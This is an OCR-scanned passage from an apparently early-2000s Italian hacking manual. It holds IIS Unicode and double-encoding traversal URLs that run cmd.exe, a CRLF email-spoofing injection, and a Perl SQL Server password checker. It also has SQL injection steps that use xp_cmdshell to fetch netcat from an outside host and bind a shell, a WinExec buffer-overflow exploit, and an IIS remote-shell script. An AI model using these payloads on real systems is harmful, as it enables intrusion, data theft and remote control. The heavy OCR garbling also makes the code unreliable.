/adsamples/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd.exe? 
/c+dir 

/adsamples/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/sy stem32Zcmd.exe 
?/c+dir 

/c/winnt/system32/cmd. exe?/c+dir 
/cgi- 

bin/ . . %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+dir 
/cgi- 

bin/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/sy stem32/ 'cmd. exe? '/c+dir 
/d/winnt/system32/cmd. exe?/c+dir 

/iisadmpwd/ . . %252f. . %252f. . %252f. . %252f. . %252f. . %252fwinnt/system32/cmd. exe? 
/c+dir 

/iisadmpwd/ . . %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . /winnt/sy stem32Zcmd.exe 
?/c+dir 

/msaDC/. . %%35%63. . %%35%63. . %%35%63. . %%35%63winnt/system32/cmd.exe?/c+dir 

/msaDC/. . %%35c. . %%35c. . %%35c. . %%35cwinnt/system32/cmd.exe?/c+dir 

/msaDC/. . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd.exe?/c 

+dir 

/msaDC/. . %255c. . %255c. . %255c. . %255cwinnt/system32/cmd. exe?/c+dir 

/msadc/. . %%35%63. ./. . %%35%63. ./. .%%35%63. . /winnt/sy stem32Zcmd.exe? /c+dir 

/msadc/ . . %%35c. ./. . %%35c. ./. . %%35c. . /winnt/system32/ cmd. exe? /c+dir 

/msadc/ . . %25%35%63. . %25%35%63. . %25%35%63. . %25%35%63winnt/system32/cmd. exe?/c 

+dir 

/msadc/. .%25%35%63. ./. . %25%35%63. ./. . %25%35%63. . /winnt/sy stem32Zcmd.exe? /c+d 
ir 

ZmsadcZ ■ ■ %255c. . %255c. . %255c. . %255cwinntZsystem32/ 'cmd. exe? / 'c+dir 
ZmsadcZ ■ ■ %255c. ./. . %255c. ./. . %255c. . ZwinntZ system32Zcmd.exe? Z c+dir 
ZmsadcZ. .%255c. ./. .%255c. ./. . %255cZ ■ .%cl%lc. ./. .%cl%lc. ./. .%cl%lc. . ZwinntZ sy 
stem32Zcmd. exe? Z c+dir 

ZmsadcZ- . %cO%af. ./. . %cO%af. ./. . %cO%af. . ZwinntZsystem32Zcmd.exe?Zc+dir 
ZmsadcZ- ■ %cl%af. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 

ZmsadcZ ■ ■ %cl%pc. ./. ■ %cl%pc. ./. . %cl%pc. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 
ZmsadcZ ■ . %cl%pc. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 

ZmsadcZ ■ ■ %e0%80%af. ./- . %e0%80%af. ./- . %e0%80%af. . ZwinntZ sy stem32Zcmd.exe? Z c+d 
ir 

ZmsadcZ ■ . %e0%80%af. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 

ZmsadcZ. .%f0%80%80%af. ./. . %f0%80%80%af . ./. . %f0%80%80%af. . ZwinntZsystem32Zcmd 
. exe? Z c+dir 

ZmsadcZ ■ ■ %f0%80%80%af. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 

ZmsadcZ. . %f8%80%80%80%af . ./. . %f8%80%80%80%af . ./. . %f8%80%80%80%af . . ZwinntZ sys 
tem32Zcmd. exe?Zc+dir 

ZmsadcZ ■ ■ %f8%80%80%80%af. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 

ZmsadcZ- . \ HTTPZ1 .l%eO\ HTTPZ1 .1%80\ HTTPZ1 .l%af. ./. . \ HTTPZ1 . I%e0\ 

HTTPZ1 .1%80\ HTTPZ1 .l%af. . /. . \ HTTPZ1 . I%e0\ HTTPZ1 . 1%80\ 

HTTP ZI . 1 %af. . ZwinntZsystem32Zcmd . exe \ HTTP ZI . 1 ?Zc \ HTTP ZI . 1 +dir 

ZsamplesZ ■ ■ %255c. . %255c. . %255c. . %255c. . %255c. . %255cwinntZsystem32Zcmd. exe?Zc 

+dir 

ZsamplesZ- ■ %cO%af. . %cO%af. . %cO%af. . %cO%af. . %cO%af. . ZwinntZ sy stem32Zcmd.exe? Z 
c+dir 

Zscripts . .%cl%9c. . ZwinntZ system32Zcmd.exe? Z c+dir 

ZscriptsZ ■ %252eZ ■ %252eZwinntZsystem32Zcmd. exe?Zc+dir 

ZscriptsZ ■ ■ %%35%63. . ZwinntZsystem32Zcmd.exe? / 'c+dir 

ZscriptsZ ■ ■ %%35c. . ZwinntZsystem32Zcmd.exe? Z c+dir 

ZscriptsZ ■ ■ %25%35%63 . . ZwinntZ system32Zcmd.exe? Z c+dir 

ZscriptsZ ■ ■ %252f. . %252f. . %252f. . %252 f winntZsystem32Z cmd. exe? Z c+dir 

ZscriptsZ. . %252f. . ZwinntZ sy stem32Zcmd.exe? Z c+dir 
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/scrlpts/ . . %255c%255c. . /wlnnt/system32/cmd. exe?/c+dlr 
/scrlpts/ . . %255c. . %255cw±nnt/system32/cmd. exe?/c+dir 
/scrlpts/ . . %255c. . /wlnnt/system32/cmd.exe?/c+dir 

/scrlpts/. . %CO%AF. . %CO%AF. . %CO%AF. . %C0%AFwinnt/system32/cmd.exe?/c+dlr 

/scrlpts/. . %C1%1C. .%C1%1C. . %C1%1C. . %Cl%lCwlnnt/system32/cmd.exe?/c+dir 

/scrlpts/. . %C1%9C. . %C1%9C. . %C1%9C. . %Cl%9Cwlnnt/system32/cmd. exe?/c+dlr 

/scrlpts/ . . %c0%9v. . /wlnnt/system32/cmd.exe?/c+dlr 

/scrlpts/ . . %cO%af. . /wlnnt/system32/cmd.exe?/c+dlr 

/scrlpts/ . . %cO%qf. . /wlnnt/system32/cmd. exe?/c+dlr 

/scrlpts/ . . %cl%lc. . /wlnnt/system32/cmd. exe?/c+dlr 

/scrlpts/ . . %cl%8s. . /winnt/system32/cmd. exe?/c+dlr 

/scrlpts/ . . %cl%9c. . /winnt/system32/cmd. exe?/c+dlr 

/scrlpts/ . . %cl%af. . /winnt/system32/cmd. exe?/c+dlr 

/scrlpts/ . . %cl%pc. . /wlnnt/system32/cmd.exe?/c+dlr 

/scrlpts/. . %e0%80%af. . /wlnnt/system32/cmd. exe?/c+dlr 

/scrlpts/. . %f0%80%80%af. . /winnt/system32/cmd. exe?/c+dlr 

/scrlpts/. . %f8%80%80%80%af. . /wlnnt/system32/cmd. exe?/c+dlr 

/scrlpts/. . %fc%80%80%80%80%af. . /wlnnt/system32/cmd. exe?/c+dlr 

/ script s / root . exe?/c+dlr/msadc/ . . %fc%80%80%80%80%af. ./. . %fc%80%80%80%80%af. . 

/. . %fc%80%80%80%80%af. . /winnt/system32/cmd. exe?/c+dlr 
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I nvio email falsificata tramite oggetti ASP 

Uno dei linguaggi più utilizzati al giorno d'oggi sul WEB è sicuramente ASP il quale tra 
l'infinità di oggetti orientati agli usi più disparati ne possiede uno che permette di inviare delle 
email direttamente dalle pagine WEB. 

Si tratta dell'oggetto CDONTS.NEWMAIL il quale può essere utilizzato nel'ambito di un 
qualsiasi form per il successivo invio di posta ma che però alo tesso tempo permette anche 
agli hackers di utilizzarlo per lo tesso scopo ovvero per l'invio arbitrario di posta. 
Chiaramente come tanti bugs il tutto dipende sempre dalla tipologia di validazione dei dati 
inseriti che il programmatore esegue. 

Ma partiamo dell'inizio vedendo come in genere è possibile utilizzare questo oggetto 
all'interno di una pagina ASP. 

<% 

set objNewMail = CreateObject ("CDONTS.Newmail") 
objNewMail . From = "newsletter@company.com" 
objNewMail . To = Request . QueryString ( "email ") 
objNewMail. Sub ject = "NEWSLETTER" 

objNewMail . Body = "Please find attached the newsletter . " 
objNewMail. AttachFile "c:\newsletter.txt", "mailatt.txt" 
objNewMail . Send 

%> 

La prima linea crea l'oggetto CDONTS.NEWMAIL mentre il rimenente codice seta I vari 
campi destinati ad indicare il mittente, il destinatario, il soggetto e il testo del messaggio. 
L'ultima linea è quella che di fatto permette di inviare il messaggio una volta che tutti I valori 
richiesti sono stati inseriti nefgli appositi campi. 

Le varie Request.QueryString() interrogano le variabili legate al passaggio degli argomenti 
alla pagina per ci per ricevere un messaggio questa dovrebbe essere letta nel modo che 
segue: 

http: //www. company. com/newsletter.asp?email=david@ngssoftware. com 

Come avrete potuto vedere il parametro viene settato direttamente dentro al campo che Iko 
deve contenere direattamente dalla funzione che lo legge. 

Quando alla fine l'oggetto invia l'email il tutto subisce una conversione ne formato richiesto da 
SMTP. 



mail from: newsletter@company.com 
rcpt to: david@ngssoftware.com 
data 

Sub ject: NEWSLETTER 



Se invece avesimo inserito la seguente metodlogiadi richiamo : 

http://www.company.eom/newsletter.asp7emaihvictim@spoofed.com%0D%0Adata%0D%0A 

Subject:%20Spoofed!%0D%0A%0D%0AHi,%0D%0AThis%20is%20a%20spoofed%20email 

%0D%0A.%0D%0Aquit%0D%0A 

La convesione SMTP sarebbe stata simile a :.. 



mail from: newsletter@company.com 
rcpt to: victim@spoofed.com 
data 

Sub ject: Spoofed! 
Hi, 
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This is a spoofed e-mail 




Altre informazioni legate agli attacchi a database 

Come abbiamo detto nel capitolo precedente, spesso gli attacchi ai sistemi di database 
costituiscono una via alternativa la fatto di cercare un mezzo per riuscire ad ottenere 
determinate informazioni da un sistema dove non esistono altri mezzi. 
Sempre in altri capitoli del volume abbiamo parlato della password di default che spesso 
vengono dimenticate dagli amministratori di sistema all'interno dei softwares e dei dispositivi 
hardware presenti sui servers attaccati. 

In questo caso la possibilità è quella di trovare degli accessi senza password. 

In questo caso diventa necessario disporre di una qualche utility in grado di cercare gli 

accessi a SQL Server non protetti da una password. 

Il sorgente inoltre cerca anche di eseguire un attacco brute force sul database. 

# .' /usr/bin/perl 

§§ SQL username /password checker 

§§ Parameters: senseql <IP> <username> <password> 

## Eg. to check for blank SA: 

## senseql 10.0.0.1 sa "" 

## Roelof Tenuningh / Haroon Meer 

ii roelof @ sensepost . com / haroon@sensepost . coiti 

## SensePost IT Security 

## http://www.sensepost.com http://www.hackrack.com 
## 2001/11/09 

use IO : : Socket ; 
$1=1; 

If ($#ARGV<2) {die "Usage: senseql IP username password\n"; } 
$port=1433; $host=$ARGV [ 0 ] ; $username=$ARGV[l] ; $pass=$ARGV[2] ; 
$unh=pack ( "a30 ", $username) ; $psh=pack ( "a30 ", $pass) ; 

$numu=pack ( "c", length ($username) ) ; $nump=pack ("c", length ($pass) ) ; 
$FRONT=" 020002000000020000000000000000000000000000000000000000000000000 
0000 

00000000000" ; 

$REST="30303030303061300000000000000000000000000000000000201881b82c0803 
0106 

0a0901010000000000000000007371 75656c646120312e3000000000000000000000000 
0000 

OOOOOOOOOOOObOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO 

0000 

00 "; 

$REST2=" 000000000000000000000000000000000000000000000000000000000000000 
0000 

00000000000000000000000000000000000000000000000000000000000000000000000 
0000 

00000000000000000000000000000000000000000000000000000000000000000000000 
0000 

00000000000000000000000000000000000000000000000000000000000000000000000 
0000 

00000000000000000000000000000000000000000000000000000000000000000000000 
0000 

00000000000000000000000000000000000000000000000000000000000000000000000 
0000 

000000040200004d5344424c49420000000706000000000dll000000000000000000000 
0000 

00000000000000000000000 "; 

$hfront=pack ( "H* ", $FRONT) ; $hrest=pack ( "H* ", $REST) ; $hrest2=pack ( "H* ", $RE 
ST2) 

$FULL=$h front . $unh . $numu . $psh . $nump . $hrest . $nump . $psh . $hrest2; 

$SENDY2="02010047000002000000000000000001000000000000000000000000000000 

0000 

00000000000000000000000000000000000000000000000000000000303030000000030 
0000 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



$remote = IO: -.Socket: : INET->new (Proto=>"tcp" , PeerAddr=>$host, PeerPort 
=> 

$port) 1 1 die "No SQL here man. . . "; 

print $remote $FULL; print $remote $SENDY2; 

recv($ remote, $back, 100,MSG_PEEK) ; 

if ($back =~ /context to 'master' /) {print "Yep - go for it\n" } 
else {print "No dude..\n";} 
dose ($remote) ; 

La seguente tabella riporta alcune password usate dai database. 



Oracle 


SQL Server 


user 


password 


user 


password 


internai 


internai 


sa 


<blank> 


internai 


manager 


sa 


sa 


sys 


sys 


sa 


admin 


sys 


manager 


admin 


admin 


sys 


system 


admin 


<blank> 


sys 


internai 






sys 


change_on_install 






system 


manger 






system 


system 






system 


internai 







Chiaramente il problema delle injections all'interno dei forms presenti sui WEB dipende in 
gran parte dalla mancanza di controlli fatti dai progettisti software. 

Avevamo visto che la forma classica d'interrogazione di un database legato all'accesso ad un 
sistema ha in genere questa forma: 

SELECT XYZ from tblUsers 
WHERE User_ID= ' <field from web form>' 
AND U_Password= ' <field from web forno' 
IF [Stuff is Returned] {Login looks good} 
ELSE {Login looks bad) 

Avevamo visto che l'inserimento di un apicetto di chiusura e del carattere che definisce il 
REM dentro a Sql Server avrebbe potuto essere usato per trasformare l'interrogazione in una 
che qualsiasi cosa venga inserita questa restituisca sempre una condizione di TRUE. 
Spesso però il problema è che gli input vengono controllati almeno per quello che riguarda la 
lunghezza del valore inserito. 

A questo punto è necessario trovare una condizione che possa essere inserita in pochissimi 
caratteri. 

Una ottima è quella che usa il valore di controllo ridondante 1 =1 , ovvero : 

' OR 1=1 — 

Lo statement SQL di prima diventerebbe dopo l'iniezione : 



SELECT XYZ from tblUsers 




WHERE User_ID=' zzz ' OR 1=1 — 


AND 


U_Password=' ' 




IF [Stuff is Returned] {Login 


looks good} 


ELSE {Login looks bad} 
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Nell'ambito della raccolta delle informazioni legate al database spesso è interessante riuscire 
ad ottenere il numero dei campi : 

Nell'esempio di prima invece di inserire come password il valore visto possiamo inserire : 



La risposta potrebbe essere : 

The ODBC error returned this time is 
Microsoft OLE DB Provider for ODBC Drivers error 
•80040el4 ' 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column 
' Admin .Userid' is invalid in the select list because it 

is not contained in either an aggregate function or the 

GROUP BY clause. 
/ admin/ admin. asp, line 13 

Da questo mesaggio abbiamo ricavato il nome della tabella, Admin, e quello della colonna 
Userid. 

Modifichiamo la stringa inserita : 



A questo punto la risposta è : 

Microsoft OLE DB Provider for ODBC Drivers error 
•80040el4 ' 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Ali 
queries in an SQL statement containing a UNION operator 
must have an equal number of expressions in their target 




Questa ci dice che Userid non è l'unica colonna del database. 
Continuiamo la modifica della stringa iniettata con : 

sensepost ' union select userid, userid from Admin— 

Il masaggio restituito potrebbe essere nuovamente lo stesso per cui potremmo ancora 
modificare la stringa fino a quando questo tipo d'errore termina. 
La stringa potrebbe anche diventare : 

sensepost ' union select userid, userid, userid, userid, userid from 



A questo punto il messaggio restituito diventa : 

Microsoft OLE DB Provider for ODBC Drivers error 
'80040e07' 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax 
error converting the varchar value ' super Admin ' to a 
column of data type int . 



Questa ci dice che il primo valore utente della tabella è 'superAdmin' per cui a qesto punto 
per riuscire ad ottenere la password potremmo dare : 
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Il fatto di continuare a provare ad aumentare gli argomenti, come nel caso di prima con il 
campo userid, è possibile farlo anche con il campo password fino a quando il messaggio 
d'errore ci ritorna : 

Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07 ' 
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error 
converting the varchar value 'hldd3n ' to a column of data type int 
/admin/admin. asp, line 13 



A questo punto sapere la tipologia dei dati diventa semplice. 




La risposta : 



Microsoft OLE DB Provider for ODBC Drivers error 
'80040e07' 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum or 
average aggregate operation cannot take a varchar data 
type as an argument . 



Questo ci dice che userid è di tipo varchar. 

Ora dobbiamo ripetere la procedura per ogni campo che abbiamo enumerato. 
Una volta conosciuti i tipi possiamo dare : 

sensepost' insert into Admin (userid, password, lastlogin) values 
( 'haroon ' , 'hi' , 'Dee 19 2001 5 : 53PM ') — 

Come abbiamo visto nei capitoli precedenti lagati alle iniezioni dentro ai database speso è 
possibile tramite stored procedure l'esecuzione di comandi I quali però possiedono le 
permissions dell'utente che ha eseguito il database stesso. 

Per riuscire ad avere queste informazioni legate agli utenti possiamo proseguire i nostri 
inserimenti mediante : 




L'errore restituito è : 




Proviamo a creare una tabella : 

sensepost' create table master. .#sensepost (x int) — 

Il messaggio ci avvisa che l'utente è DBO 

[Microsoft] [ODBC SQL Server Driver] [SQL Server] CREATE 
TABLE permis sion denied, database x SECOMMERCE ' , owner 
'dbo ' . 

Ma a questo punto se volessimo usare questi metodi per controllare la macchina come 
potremmo fare ? 

Innanzi tutto settiamo uno sniffer come potrebbe essere TCPDUMP nel seguente modo : 



A questo punto dobbiamo guardare le richieste che vengono inviate al database. 
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Nel form della vittima digitiamo : 

sensepost' exec master. . xp_cmdshell y nslookup a.com 
<your_box_on_the_ ' net>' - 

Il sistema SQL esegue un NSLOOKUP usando il nostro BOX come nameserver. 

A questo punto mse tutto funziona avremo della informazioni come ad esempio l'IP del 

backend SQL. 

Fate attenzione che il WEB server e il backend SQL potrebbero non girare sulla stessa 
piattaforma. 

A questo punto conoscendo qeste informazioni possiamo cercare di uplodare il nostro solito 
NETCAT con : 

sensepost' exec master. .xp_cmdshell y tftp -I nasty.com 



e quindi di eseguirlo con : 
sensepost' exec master. . xp_cmdshell x c:\nc.exe -1 -p 8000 -e cmd.exe' 



Buffer overflow non all'interno degli stack 

La maggior parte dei buffer overflow visti fino ad ora usavano lo stacak o l'heap come basi 
per la creazione dll'exploit. 

Questo capitolo server a descrivere come di fatto è possibile scrivere un buffer overflow 
anche senza affidarsi a questi segmenti. 

La loro scrittura è più semplice di questi in quanto l'unica cosa che è necessario capire è il 
metodo con cui vengono chiamate le funzioni a basso livello. 

Un ulteriore semplificazione di questo tipo di buffer overflow è legata al fatto che in questo 
caso non è necessario conoscere l'assembler. 

Il concetto di buffer overflow rimane lo stesso ovvero di fatto si tratta di inserire all'interno di 
una buffer più dati di quanti questi possa contenere. 

Mentre nei buffers overflow legati allo stack I dati inseriti devono contenere anche il codice 
che deve essere eseguito, qui non è necessario nessun codice. 

Mentre l'indirizzo di ritorno che si andava a soprascrivere nei buffer basati sullo stack era 
legato ad un codice presete dentro al buffer stesso, qui l'indirizzo è legato ad una fnzione API 
e precisamente WinExec() o system (). 

Questo tipo di exploit sono inoltre più corti di quanto lo siano qelli basati sullo stack. 
Quando viene chiamata una funzione mediante il linguaggio C i parametri che questa 
pretende vengono inseriti, o pushati, dentro allo stack. 
Consideriamo il seguente codice : 



WinExec (command, SW_HIDE) ; 



Questa fnzione viene traslata in assembler come segue : 

mov eax, 0 // Move into the eax register SW_HIDE 
push eax // push thls onto the stack 

lea eax, [ebp-8] // load the effective address of the command into 
eax 




Come avrete potuto vedere I paramteri vengono inseriti in modo inverso dentro allo stack 

mediante delle istruzioni di PUSH. 

Lo stack potrebbe essere visto nel seguente modo : 
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ESP 


80 






FF 








Pointer al 


comando da eseguire 


12 








00 






00 






00 








SW_HIDE 




00 






00 







Quando la cali viene eseguita si verificano alcune azioni. 

Il contenuto del registro Instruction Pointer (EIP) viene cambiato in modo che questa punti 
alla nuova locazione dove si trova la funzione. 

L'indirizzo viene però inserito dentro allo stack in modo che quando la funzione termina 
questo può essere ripristinato in modo da poter proseguire l'esecuzione dal punto successivo 
a dove è avvenuta la cali. 

Assumendo che la cali sia all'indirizzo 0x00401020, quello 0x00401022 verrebbe inserito 
nello stack. 

Di conseguenza ESP viene decrementato 4. 

Quando la procedura chiamata ritorna, questo indirizzo viene preso dallo stack e usato 
denytro a EIP. 

L'esecuzione continua da qui. 





ES p 


22 




10 






— Saved Return Address 


40 




00 




80 




FF 






— Pointer to command to run 


12 




00 




00 




00 






— SW_HIDE 


00 




00 





Creando l'overflow del buffer per prima cosa è necessario soprascrivere l'indirizzo di ritorno 
con quello della fnzione che l'attaccante vuole chiamare. 
In questo esempio useremo la WinExec(). 

Questa richiede un indirizzo fittizio dopo quello reale di ritorno. e un punatore alla stringa di 
comando. 
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WinExec() accetta qualsiasi valore DWORD usato come parametro SW_* in modo che sia 

possibile usare qualsiasi cosa fosse sullo stack in prima posizione. 

Questo nega la necessità di mettere un parametro SW_* nello stack e quindi risolve il 

problema che potrebbe derivare se il puntatore alla stringa di comando avesse all'interno un 

NULL 

Tutto quello che è richiesto è una sringa terminata con un NULL.. 

Questo potrebbe presentare alcuni problemi se la stringa usata per il comando fosse nel 

seguente formato : 

command+padding+saved_return_address+dummy_saved_return_address+parameters+ . 



Questo formato potrebbe portare ad un insuccesso nell'esecuzione. 

Il modo per risolvere il problema è quello di eseguire il comando in una shell cmd e di 

separare il comando con un carattere ampersand. 

cmd le command 
&+padding+saved_return_address+dummy_saved_return_address+parameters+ 

Considerate questo programma chiamato overrun.exe 

Notate l'indirizzo fittizio chiamato DUMMY usato per la winexec. 

^include <stdio ,h> 

int main () 

{ 

char buffer [256] = ""; 
FILE *fd=NULL; 

fd = fopen ( "file . txt ", "rb ") ; 
if(fd == NULL) 

return printf ( "Couldn ' t open file .txt for reading\n") ; 
fgets (buffer, 1000, fd) ; 
return 0; 



Questo programma apre un file chiamato "file.txt" e legge 1000 caratteri dentro ad un buffer 
Il buffer è di fatto solo 256. 

In questo modo tutti caratteri oltre al 256 creano l'overflow del buffer. 

Per eseguire I' exploit usando un metodo non basato sullo stack dobbiamo scrivere un 

programma che c crei un file "file.txt" ce contenga l'exploit stesso. 

^include <stdio.h> 

int main () 

{ 

char buffer [500] =" cmd /c cale & 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB " ; 

char sraddress [8]=" \xAF\xA7\xE9 \x77"; 

char padding[8] = " \x90 \x90 \x90 \x90 "; 

char pointer_to_command[8]="\x70\x51 \x2F\x00" ; 

FILE *fd=NULL; 

fd = fopen ( "file . txt ", "w+ ") ; 

streat (buffer, sraddress) ; 

streat (buffer,padding) ; 

streat (buffer,pointer_to_command) ; 

f printf (fd, "%s" , buffer) ; 

fclose (fd) ; 

return 0; 



Come potete vedere il comando che viene eseguito è 
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Se il tutto funziona viene eseguito il calcolatore. 

L'indirizzo di ritorno viene soprascritto con l'indirizzo di WinExec. 

Un indirizzo di ritorno dummy viene creato per beneficio di WinExec e un puntatore a questa 
stringa viene attaccata alla fine. 

In caso di successo l'indirizzo di ritorno viene soiprascritto con quello di WinExec(). 
Quando il tutto torna WinExec() viene eseguita. 

WinExec ignorerà l'indirizzo dummy e quindi pende I suoi parametri e li esegue. 

Quando il tutto termina il programma andrà in crash ma in ogni caso l'utente sarà già dentro 

alla shell aperta. 



Sistema d'apertura Shell tramite I I S 

Abbiamo visto nei capitoli precedenti come mediante alcuni BUGS era possibile inviare 
comandi ad un sistema Windows che gestiva il WEB server tramite MS. 
I vari BUGS erano l'UNICODE, RDS, MSADC e cosi via. 

La presenza di questi BUGS ha permesso innanzi tutto ad un infinità di virus come NIMBDA 
di prolificare ma quello che è più importante è sicuramente legato al fatto che moltissimi casi 
di hacking che si sono avuti in questi ultimi due anni erano sicuramente collagti a questi. 
Ed ecco uno script PERL ato ad aprire una shell su sistemi con MS. 

# .' / usr/bln/perl 
# 

# US Shell by bozo 

# Copyleft : Cartel Securite - Groupe CGBI 

# Ver sion : 1.3 

# 12/19/2001 
# 

use strict; 

use LWP : : UserAgent ; 
use HTTP : :Request; 
use HTTP : : Response ; 
use Terra: : ReadLine; 
use Getopt : : Long ; 

require LWP: -.Protocol : :httplO; 

Getopt : :Long: : Configure ( "bundling") ; 

m Y ($p_exists, $c, $a, $q, $o, $h, $v, $e, $s, $p, $f, $nd, $wd, 
$no_cd, $cmd_sep, $host, $path, $basepath, $term, $version) ; 

$version = "1.3"; 

# 

# Defining functions 
# 

# sendRequest ($url) 
sub sendRequest { 

my $ua = LWP : :UserAgent->new() ; 
$ua->agent ("bozilla vO/gold edition") ; 
my $req = HTTP: : Request —>new (GET => $_[0]); 
$req->referer ( "http : //www.nsa . gov") ; 
my $result = $ua->request ($req) ; 

return $result; 
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} 

# parseResult ($result) 
sub parseResult { 

my $content; 

if ($_[0]->is_error() ) { 

my $error = $_ [0] ->status_line; 
if ( $error =~ /404/ ) { 

print "$_[0] not found. \n"; 

return 0; 

ì 

$content = $_[0] ->content () ; 

$content =~ s/ . *?\<body\> ( . *) \<\/body\> . */$l/gsl; 
if ( $content =~ /\<pre\>/± ) { 

$content =~ s/ . *?<pre> ( . *?) <\/pre> . */$l/gsi; 

} 

print $content . "\n"; 
} else { 

$content = $_[0] ->content () ; 
print $content; 

ì 

ì 

# download ($url, $local_file) 
sub download 

{ 

my $url = $_[0] ; 

my $filename = $_[1] ; 

my $ua = new LWP : : UserAgent ; 

$ua->agent ("bozilla vO/gold edition") ; 

my $req = new HTTP : : Request GET => "$url"; 

$req->referer ( "http : //www.nsa . gov") ; 

my $res = $ua->request ($req, $filename) ; 

if ( $res->is_error () ) { 

my $error = $res->status_line; 
if ( $error =~ /404/ ) { 

print "$url not found. \n"; 

return 0; 
} else { 

print "Couldn't copy file at $url . \n"; 

} 

return 1; 
} 

ì 



# checkPath($path) 
sub checkPath { 

my $result = sendRequest ( "http : //$host/$_ [0] ?/c+dir" ) ; 

if ($result->is_error () ) { 

my $error = $result->status_line; 
if ( $error =~ /404/ ) { 

if ( $v ) { print "Command executable not found at $_[0] on 
$host.\n"; } 

return 0; 

} 

if ( $error =~ /403/ ) { 
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if ( $v ) { print "Access denied at $_[0] on $host. \n"; } 
return 0; 

} 

chomp ( $error) ; 

if ( $v ) { print "$error : $_[0] . \n"; } 

if ( $e ) { my $content = $result->as_string; print "Detail 
: \n$content \n "; } 
return 0; 

} 

if ( !$q && !$c ) { print "Found executable at $_[0] on $host . \n"; 

ì 

$result = sendRequest ( "http : //$host/$_ [0] ?/c+cd. .%20&dir") ; 
if ($result->is_error () ) { 
if ( !$q && !$c ) { 

print "Mmh, this system doesn 't appear to support the 
\ ' $cmd_sep\ ' string for command chaining . \n" ; 

print "If it includes the ' & ' char, US is likely interpreting 
as a CGI argument separator. \n"; 

print "Disabling path memorization (if this is a mistake, 
enable it with /nocd off) . \n"; 
} 

$no_cd = 'true'; 

} 

if ( $c ) { print "Executable found at $_[0]\n"; } 
else { 

$result = sendRequest ( "http : //$host/$_ [0] ?/c+ver ") ; 
parseResult ($result) ; 

} 

return 1; 

ì 

# runShell ($path) 
sub runShell { 

if ( $path =~ /cmd\.exe/ ) { 
$basepath = $path; 

$basepath =~ s/\/winnt \/system32\/cmd\ . exe//; 
} else { 

$basepath = ' ' ; 

} 

while (true) { 

my $line = $term->readline ( "$host : ") ; 
$term->addhi story ($line) if /\S/; 
runCommand ($line) ; 

} 

) 

# runCommand ($ command) 
sub runCommand { 

my $url; 

my $line = $_[0] ; 

if ( defined($line) ) { 
chomp $line; 

# Defining internai commands 

if ( $line =~ /*\s*\/exit\s*$/i II $line =~ /*\s*\/quit\s*$/i 

) { 

print STDOUT "Quitting US Shell. \n"; 
exit; 

} 

if ( $line =~ /*\s*\/nocd/i ) { 
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if ( $line =~ / A \s*\/nocd\s*on\s*$/i ) { 
$no_cd = "true"; 

print "Disabling patti memorization . \n"; 
next; 

} elsif ( $line =~ /*\s*\/nocd\s*off\s*$/i ) { 
$no_cd = ' ' ; 

print "Enabling patti memorization. \n" ; 
next; 
} else { 

print f "Patii memorization is currently %s. \n", 
($no_cd) ?"disabled" : "enabled"; 
next; 

ì 

} 



if ( $line =~ / A \s*\/help\s*$/i ) { 
print "Help for US shell 

print "\tcd <directory> : currently supports and 
•\\'.\n\n"; 

print "\t/nocd [on/off] : disables/enable path 
memorization\n\t" . " "xl7 . " (without arguments, prints current 
status) \n"; 

print "\t/setcmdsep <sep> : sets DOS command separator to 
<sep> (de fault = &) . \n" ; 

print "\t/help : this command. \n"; 

print "\t/quit : quits US shell. \n"; 

print "\t/exit : quits US shell. \n\n"; 

print "\t! <command> : run <command> on the locai 
machine. \n\n" ; 

next ; 

} 

if ( $line =~ /*\s*\/setcmdsep\s*(.*)\s*$/i ) { 
$cmd_sep = "$1"; 

print "Setting command separator to $cmd_sep. \n"; 
next ; 



if ( $ line =~ /*\s*\/cp\s+(.+)\s+(.+)\s*$/i ) { 
if ( $basepath ) { 

$url = "http: //$host$basepath$l" ; 

download ($url, $2); 
} else { 

print "Sorry, we are not accessing the command shell 
through a directory traversai. \n"; 

print "Cannot generate an URL to access the file you 
requested. \n" ; 
ì 

next ; 



if ( $line =~ /*!(.*) /i ) { 
print ^$1\- 
next ; 

} 



# Defining pseudo-shell commands 
if ( $line =~ /*cd\s+(.*) /i ) { 
$nd = $1; 

if ( $nd eq " . ." ) { 
if ( $wd eq "\\" ) { } 
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elsif ( $wd =~ ) { $wd = "\\"; } 

else { $wd =~ s/(.*)\\.*/$l/; } 

ì 

elsif ( $nd =~ / A \ \ . */ ; { $wd = $nd; } 
elsif ( $nd =~ /*\w+/ ) { 

if ( $wd eq "\\" ) { $wd .= $nd; } 

else { $wd .= "\\$nd"; } 
} else { 

print "Hihihihihi, that tickles ! \n" ; 

} 

next; 

} 

if ( $line =~ / A \s*\// ; { 

print "This is not a valid syntax for a US Shell internai 
command. \n "; 

print "See /help for details . \n"; 
next; 

} 

# $line is not an internai command 
$line =~ s/\s/\%20/g; 
